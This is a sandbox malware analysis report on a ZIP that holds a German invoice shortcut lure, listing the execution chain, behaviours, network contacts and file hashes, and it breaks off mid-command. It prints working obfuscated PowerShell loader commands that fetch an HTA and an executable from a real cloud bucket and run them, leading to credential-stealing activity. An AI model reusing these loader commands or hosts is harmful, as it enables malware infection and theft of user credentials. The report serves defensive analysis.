Analysis Overview
SHA256
649ecc1223387e9422fd9c19ace2c3624a422f06c42fcd7697ff03036c3b7120
Threat Level: Known bad
The file 649ecc1223387e9422fd9c19ace2c3624a422f06c42fcd7697ff03036c3b7120.zip was found to be: Known bad.
Execution chain, as recorded in the behavioral runs below: the archive carries a German-language invoice lure (Rechnung_2024_009x.pdf.lnk, "Rechnung" = invoice). cmd /c opens the LNK, which starts powershell.exe with -ExecutionPolicy UnRestricted and an index-arithmetic obfuscated script; that script defines the aliases ^[ and /# and calls mshta.exe on 123.hta hosted in a Cloudflare R2 public bucket (pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev). The HTA starts a second powershell.exe that rebuilds its strings with a per-character offset (4990), downloads EXBRRVQT.exe from the same bucket over TLS 1.2 and writes it to %APPDATA%. On the Windows 10 images EXBRRVQT.exe runs as a WiX Burn bootstrapper (the -burn.clean.room / -burn.filehandle.* arguments and the {GUID}\.cr and \.ba directories under C:\Windows\Temp), unpacks ActiveISO.exe with Qt5 and VC runtime DLLs, copies it to %APPDATA%\MonitorBrowser2, and ActiveISO.exe then maps sections into, writes to and sets the thread context of a SysWOW64\cmd.exe (PID 4744 -> 840), a pattern consistent with process hollowing. UploadAlt_Ti.exe subsequently reads browser profile data, WinSCP keys and the Outlook profile key, and the run ends with a TLS connection to sirnisirlo.online (104.21.35.62). The Windows 7 runs stop after the download stage.
Malicious Activity Summary
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
Reads user/profile data of web browsers
Reads WinSCP keys stored on the system
Loads dropped DLL
Executes dropped EXE
Accesses Microsoft Outlook profiles
Command and Scripting Interpreter: PowerShell
Suspicious use of SetThreadContext
Browser Information Discovery
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Modifies system certificate store
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
outlook_office_path
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-14 20:00
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-14 20:00
Reported
2024-11-14 20:02
Platform
win10v2004-20241007-en
Max time kernel
118s
Max time network
135s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{83FAC4A9-E795-470B-84F9-352356534D2B}\.cr\EXBRRVQT.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
Loads dropped DLL
Reads WinSCP keys stored on the system
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4744 set thread context of 840 | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | C:\Windows\SysWOW64\cmd.exe |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{83FAC4A9-E795-470B-84F9-352356534D2B}\.cr\EXBRRVQT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Rechnung_2024_0091.pdf.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $a='48aAs.69edS3b/:15u2vtmrpL0-7h'; &(-join($a[(-648+652),(169-167),(990-966)])) ^[ (-join($a[(-648+652),(169-167),(990-966)])); ^[ /# (-join($a[(-476+497),(-648+652),(-158+186),(-824+844),(169-167)])); foreach($z in @((-105+133),(-426+446),(575-555),(173-150),(-217+221),(-509+523),(524-511),(711-698),(210-187),(-471+488),(-724+736),(-668+694),(-606+622),(-351+363),(906-899),(-719+737),(899-881),(166-155),(387-375),(-188+203),(-604+616),(783-776),(-378+386),(775-748),(660-660),(995-993),(803-776),(-863+888),(-920+932),(333-325),(994-976),(559-541),(700-698),(835-810),(-958+959),(425-410),(-411+417),(686-684),(-963+964),(569-557),(934-907),(861-853),(-724+726),(950-941),(494-489),(-470+492),(-789+807),(805-800),(-232+241),(-603+611),(1008-989),(-242+255),(-653+668),(-705+723),(580-569),(-536+541),(986-958),(736-716),(-368+370))){$m+=$a[$z]}; /# $m;
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev/123.hta
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hQzEzFacg($guorUJ, $OIoEigYq){[IO.File]::WriteAllBytes($guorUJ, $OIoEigYq)};function uuuOHRemK($guorUJ){if($guorUJ.EndsWith((ijnaJnaV @(5036,5090,5098,5098))) -eq $True){Start-Process (ijnaJnaV @(5104,5107,5100,5090,5098,5098,5041,5040,5036,5091,5110,5091)) $guorUJ}else{Start-Process $guorUJ}};function xlptFHdqR($FSYzd){$EBqZdo = New-Object (ijnaJnaV @(5068,5091,5106,5036,5077,5091,5088,5057,5098,5095,5091,5100,5106));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OIoEigYq = $EBqZdo.DownloadData($FSYzd);return $OIoEigYq};function ijnaJnaV($UxikGUX){$MKUYRJP=4990;$VRwScE=$Null;foreach($NymBWJi in $UxikGUX){$VRwScE+=[char]($NymBWJi-$MKUYRJP)};return $VRwScE};function TQiKbyGz(){$vXhNEzkB = $env:APPDATA + '\';$WRrNymqB = xlptFHdqR (ijnaJnaV @(5094,5106,5106,5102,5105,5048,5037,5037,5102,5107,5088,5035,5043,5088,5047,5040,5040,5041,5088,5039,5088,5047,5091,5045,5042,5087,5045,5038,5088,5091,5040,5040,5087,5038,5046,5039,5044,5087,5046,5088,5045,5091,5087,5090,5036,5104,5040,5036,5090,5091,5108,5037,5059,5078,5056,5072,5072,5076,5071,5074,5036,5091,5110,5091));$AvKehPB = $vXhNEzkB + 'EXBRRVQT.exe';hQzEzFacg $AvKehPB $WRrNymqB;uuuOHRemK $AvKehPB;;;;}TQiKbyGz;
C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe
"C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe"
C:\Windows\Temp\{83FAC4A9-E795-470B-84F9-352356534D2B}\.cr\EXBRRVQT.exe
"C:\Windows\Temp\{83FAC4A9-E795-470B-84F9-352356534D2B}\.cr\EXBRRVQT.exe" -burn.clean.room="C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe" -burn.filehandle.attached=540 -burn.filehandle.self=548
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\ActiveISO.exe
"C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\ActiveISO.exe"
C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | udp |
| US | 172.66.0.235:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | 235.0.66.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.21.192.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 172.66.0.235:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sirnisirlo.online | udp |
| US | 104.21.35.62:443 | sirnisirlo.online | tcp |
| US | 8.8.8.8:53 | 62.35.21.104.in-addr.arpa | udp |
Files
memory/736-2-0x00007FFB0A403000-0x00007FFB0A405000-memory.dmp
memory/736-8-0x0000019D7AF50000-0x0000019D7AF72000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k0fdvpxm.z35.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/736-13-0x00007FFB0A400000-0x00007FFB0AEC1000-memory.dmp
memory/736-14-0x00007FFB0A400000-0x00007FFB0AEC1000-memory.dmp
memory/736-17-0x00007FFB0A400000-0x00007FFB0AEC1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 75b4b2eecda41cec059c973abb1114c0 |
| SHA1 | 11dadf4817ead21b0340ce529ee9bbd7f0422668 |
| SHA256 | 5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134 |
| SHA512 | 87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626 |
C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe
| MD5 | b6ab13b3b9903bf84327737ba227bab3 |
| SHA1 | 65dff8665b502ba33f3effb8430263e4f906c1c0 |
| SHA256 | baa56e574d8deed445d0e58487add9d429d60bbb1b39943c581bcf50e9bd91d6 |
| SHA512 | 6f6ec1217e14f96a52cfa314327a09bfe74199fa0a85d94f0bd5381a0af7c96ac26ba8b5506663f76473c0714609c80d58cb86bde73888cfd6ea15060793f5c7 |
C:\Windows\Temp\{83FAC4A9-E795-470B-84F9-352356534D2B}\.cr\EXBRRVQT.exe
| MD5 | eb26dfa5e4e3170d90b5629df0715aa9 |
| SHA1 | bbc10367aa29aa36a6e53c63b60a6936bc6f1720 |
| SHA256 | 70721a20760818839c7ef0ce2d684666bd07bbb79b87415944c6efbce58f7906 |
| SHA512 | 11e2683c8f47c62548050f863386e62908c5dd7e456ca13c22644ecb984533d3abdd72d1fd5a3ac53c1b2734e5999554d383f3f5c615d4c94c4c169664787bf9 |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\Helicoid.dll
| MD5 | a9c5977784daf8cebe8408a8b6db3fbe |
| SHA1 | 8ae8d67007cdca9acf96681ffa6200e5847972de |
| SHA256 | 63f5a34563b62de3dffa57401d7225f4687933cef250b78b995eee813c862fad |
| SHA512 | 886fbea2c959ce4245185d1dcec3efcfbb50a71840c964d4fd8e0a46f7fbf8afbf7445bc2d892789f25124b862912fb0c3556c5004a7e6ddb4ee13b87cf58a65 |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\ActiveISO.exe
| MD5 | b84dfabe933d1160f624693d94779ce5 |
| SHA1 | ac0133c09708fe4a3c626e3ba4cdf44d3a0e065f |
| SHA256 | 588cb61b36a001384a2833bd5df8d7982ca79d6ae17a3d83a94e01b1e79684bd |
| SHA512 | eeaeef8d6b5fa02dedf9818babaa4b5ffdb87300521883aa290289dcc720b3d543279085ed3fc649b74654143e678502e56eb3f92c4baf53c075977de33c1b0e |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\vcruntime140_1.dll
| MD5 | 75e78e4bf561031d39f86143753400ff |
| SHA1 | 324c2a99e39f8992459495182677e91656a05206 |
| SHA256 | 1758085a61527b427c4380f0c976d29a8bee889f2ac480c356a3f166433bf70e |
| SHA512 | ce4daf46bce44a89d21308c63e2de8b757a23be2630360209c4a25eb13f1f66a04fbb0a124761a33bbf34496f2f2a02b8df159b4b62f1b6241e1dbfb0e5d9756 |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\vcruntime140.dll
| MD5 | f12681a472b9dd04a812e16096514974 |
| SHA1 | 6fd102eb3e0b0e6eef08118d71f28702d1a9067c |
| SHA256 | d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8 |
| SHA512 | 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2 |
memory/1020-90-0x00007FFB09AD0000-0x00007FFB0A01E000-memory.dmp
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\msvcp140.dll
| MD5 | 7db24201efea565d930b7ec3306f4308 |
| SHA1 | 880c8034b1655597d0eebe056719a6f79b60e03c |
| SHA256 | 72fe4598f0b75d31ce2dc621e8ef161338c6450bb017cd06895745690603729e |
| SHA512 | bac5729a3eb53e9bc7b680671d028cabef5ea102dfaa48a7c453b67f8ecb358db9f8fb16b3b1d9ea5a2dff34f459f6ac87f3a563c736d81d31048766198ff11e |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\Qt5Core.dll
| MD5 | 8c735052a2d4e9b01b0e028f0c20f67c |
| SHA1 | b72bde11de3310a495dd16520362f4adbf21717a |
| SHA256 | d751ab0357f71586b1793ce4166295aba085334647d6e3ffcd49287a801273e7 |
| SHA512 | 0bbd920e1b48361c7f3e1540ddb12fa6c9146bfe36e13eba2b2e6ca8bf3ad961d88121c6f70eca6d9ea413900455e696f7233c5bb54415ca7d2c9c1c0d4c1fb3 |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\Qt5Network.dll
| MD5 | fe5ed4c5da03077f98c3efa91ecefd81 |
| SHA1 | e23e839ec0602662788f761ebe7dd4b39c018a7f |
| SHA256 | d992aaeb21cb567113126c2912cf75e892c8e3ead5d50147a11abe704b9e2e2b |
| SHA512 | 22514732a0edf8fc2b8770139599132429080b86d2844143d21bb834cbddaaa077d763969960e39e2050a69493c1aae191600e5df6107bde90fae589a054f071 |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\Qt5Gui.dll
| MD5 | 34893cb3d9a2250f0edecd68aedb72c7 |
| SHA1 | 37161412df2c1313a54749fe6f33e4dbf41d128a |
| SHA256 | ca8334b2e63bc01f0749afeb9e87943c29882131efe58608ea25732961b2df34 |
| SHA512 | 484e32832d69ec1799bd1bcc694418801c443c732ed59ecd76b3f67abf0b1c97d64ae123728dfa99013df846ba45be310502ef6f8da42155da2e89f2a1e8cb2c |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\Qt5Widgets.dll
| MD5 | c502bb8a4a7dc3724ab09292cd3c70d6 |
| SHA1 | ff44fddeec2d335ec0eaa861714b561f899675fd |
| SHA256 | 4266918226c680789d49cf2407a7fec012b0ed872adafb84c7719e645f9b2e6d |
| SHA512 | 73bef89503ce032fba278876b7dab9eac275632df7a72c77093d433c932272da997e8fbeb431a09d84baac7b2ab2e55222ff687893311949a5603e738bfa6617 |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\Qt5PrintSupport.dll
| MD5 | d0634933db2745397a603d5976bee8e7 |
| SHA1 | ddec98433bcfec1d9e38557d803bc73e1ff883b6 |
| SHA256 | 7d91d3d341dbba568e2d19382e9d58a42a0d78064c3ad7adfe3c7bb14742c2b1 |
| SHA512 | 9271370cd22115f68bd62572640525e086a05d75f5bc768f06e20b90b48a182f29a658a07099c7bc1e99bf0ffcf1229709524e2af6745d6fed7b41c1addd09f1 |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\StarBurn.dll
| MD5 | 41e19ba2364f2c834b2487e1d02bb99a |
| SHA1 | 6c61d603dddfe384a93ad33775b70681d0a396d9 |
| SHA256 | c040a25377028b0c28db81a012de786c803a0e9d6f87ce460335a621d31f5340 |
| SHA512 | 6ebf4a9e80f16c6a03ff357d2da9a34a4227bfd65eb66d1d335349a77ba066d069ba0d47d46229b3c77b59052c42d388678662f970b418d8cc3cfb1223427d8c |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\vechpt
| MD5 | dd899ca13e5bef55bcea07e167da891b |
| SHA1 | e883f0240f127520486f063b033fb34fa2dfe5c1 |
| SHA256 | a818d6fa8caddaa608345ea40b75073a7c98637161794918566e2ddeeede47e7 |
| SHA512 | e38437899fcc433ef89a04c6a68684ea5110181af48a4699836939cf167d0c1fe7932432518445e90acbcbc151ee324d77de064147d97fdedf6ecabaac788c06 |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\dcfa
| MD5 | 456596683dad1217c76d8c0f47b5cfbc |
| SHA1 | 001ae3f937aa75ad2175289c6e8f09561a1cbb35 |
| SHA256 | a7e578d0f7a5d522e4b4e62864f77cbb1830dc7e7026c9ee0b5f6fa7156c727f |
| SHA512 | 537420007a4985f2deb4b2a48af1ba61cf8cc112359ec1cdbd02dfb8e958ab5ab4ec302cd0698a14d4560afe6c23627d1d4d080eac9daa7cb5edc7259cb73591 |
memory/1020-93-0x00007FFB08BD0000-0x00007FFB08D42000-memory.dmp
memory/4744-130-0x00007FFB09AD0000-0x00007FFB0A01E000-memory.dmp
memory/4744-133-0x00007FFB08BD0000-0x00007FFB08D42000-memory.dmp
memory/4744-134-0x00007FFB08BD0000-0x00007FFB08D42000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3418b113
| MD5 | 594bdb7f70b7569640c67fd25095887c |
| SHA1 | cde397ffe041cac0d2a3430813d647cb15892f9b |
| SHA256 | 69d0bfb2d7b96c429366b6060dda881299d780a54249922990d745e3bdfdab21 |
| SHA512 | c9839fc20d3a98f004bcfaa0b8a84809a133b697682146a76d225a88a6cef2cdd31dcdd90312ffd77ff70fb506be758eb3feb994c441d490a09504ef17edf78d |
memory/840-137-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp
memory/840-140-0x0000000074D80000-0x0000000074EFB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
| MD5 | 967f4470627f823f4d7981e511c9824f |
| SHA1 | 416501b096df80ddc49f4144c3832cf2cadb9cb2 |
| SHA256 | b22bf1210b5fd173a210ebfa9092390aa0513c41e1914cbe161eb547f049ef91 |
| SHA512 | 8883ead428c9d4b415046de9f8398aa1f65ae81fe7945a840c822620e18f6f9930cce2e10acff3b5da8b9c817ade3dabc1de576cbd255087267f77341900a41c |
memory/3468-147-0x00007FF6E9750000-0x00007FF6E9A36000-memory.dmp
memory/3468-148-0x00007FF6E9750000-0x00007FF6E9A36000-memory.dmp
memory/3468-150-0x00007FF6E9750000-0x00007FF6E9A36000-memory.dmp
memory/3468-155-0x00007FF6E9750000-0x00007FF6E9A36000-memory.dmp
memory/3468-156-0x00007FF6E9750000-0x00007FF6E9A36000-memory.dmp
memory/3468-161-0x00007FF6E9750000-0x00007FF6E9A36000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-14 20:00
Reported
2024-11-14 20:02
Platform
win7-20241023-en
Max time kernel
120s
Max time network
122s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file (EXBRRVQT.exe is fetched, but this Win7 run records no "Executes dropped EXE" and no process after the second powershell.exe, so the Burn bundle, ActiveISO.exe and UploadAlt_Ti.exe stages seen in the Win10 runs are not observed here)
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Windows\system32\mshta.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (certificate blob omitted) | C:\Windows\system32\mshta.exe | N/A |
Note: CABD2A79A1076A31F21D253635CB039D4329A5E8 is the SHA-1 thumbprint of the ISRG Root X1 CA (the Let's Encrypt root). A stock Windows 7 image does not ship it, so a write to ROOT\Certificates by mshta.exe during its first TLS connection to r2.dev is consistent with Windows' automatic root-certificate update being triggered by the chain validation, not with a root planted by the sample. Treat this signature as low value on the Win7 runs; it does not fire on the Win10 images.
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Rechnung_2024_0092.pdf.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $a='48aAs.69edS3b/:15u2vtmrpL0-7h'; &(-join($a[(-648+652),(169-167),(990-966)])) ^[ (-join($a[(-648+652),(169-167),(990-966)])); ^[ /# (-join($a[(-476+497),(-648+652),(-158+186),(-824+844),(169-167)])); foreach($z in @((-105+133),(-426+446),(575-555),(173-150),(-217+221),(-509+523),(524-511),(711-698),(210-187),(-471+488),(-724+736),(-668+694),(-606+622),(-351+363),(906-899),(-719+737),(899-881),(166-155),(387-375),(-188+203),(-604+616),(783-776),(-378+386),(775-748),(660-660),(995-993),(803-776),(-863+888),(-920+932),(333-325),(994-976),(559-541),(700-698),(835-810),(-958+959),(425-410),(-411+417),(686-684),(-963+964),(569-557),(934-907),(861-853),(-724+726),(950-941),(494-489),(-470+492),(-789+807),(805-800),(-232+241),(-603+611),(1008-989),(-242+255),(-653+668),(-705+723),(580-569),(-536+541),(986-958),(736-716),(-368+370))){$m+=$a[$z]}; /# $m;
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev/123.hta
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hQzEzFacg($guorUJ, $OIoEigYq){[IO.File]::WriteAllBytes($guorUJ, $OIoEigYq)};function uuuOHRemK($guorUJ){if($guorUJ.EndsWith((ijnaJnaV @(5036,5090,5098,5098))) -eq $True){Start-Process (ijnaJnaV @(5104,5107,5100,5090,5098,5098,5041,5040,5036,5091,5110,5091)) $guorUJ}else{Start-Process $guorUJ}};function xlptFHdqR($FSYzd){$EBqZdo = New-Object (ijnaJnaV @(5068,5091,5106,5036,5077,5091,5088,5057,5098,5095,5091,5100,5106));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OIoEigYq = $EBqZdo.DownloadData($FSYzd);return $OIoEigYq};function ijnaJnaV($UxikGUX){$MKUYRJP=4990;$VRwScE=$Null;foreach($NymBWJi in $UxikGUX){$VRwScE+=[char]($NymBWJi-$MKUYRJP)};return $VRwScE};function TQiKbyGz(){$vXhNEzkB = $env:APPDATA + '\';$WRrNymqB = xlptFHdqR (ijnaJnaV @(5094,5106,5106,5102,5105,5048,5037,5037,5102,5107,5088,5035,5043,5088,5047,5040,5040,5041,5088,5039,5088,5047,5091,5045,5042,5087,5045,5038,5088,5091,5040,5040,5087,5038,5046,5039,5044,5087,5046,5088,5045,5091,5087,5090,5036,5104,5040,5036,5090,5091,5108,5037,5059,5078,5056,5072,5072,5076,5071,5074,5036,5091,5110,5091));$AvKehPB = 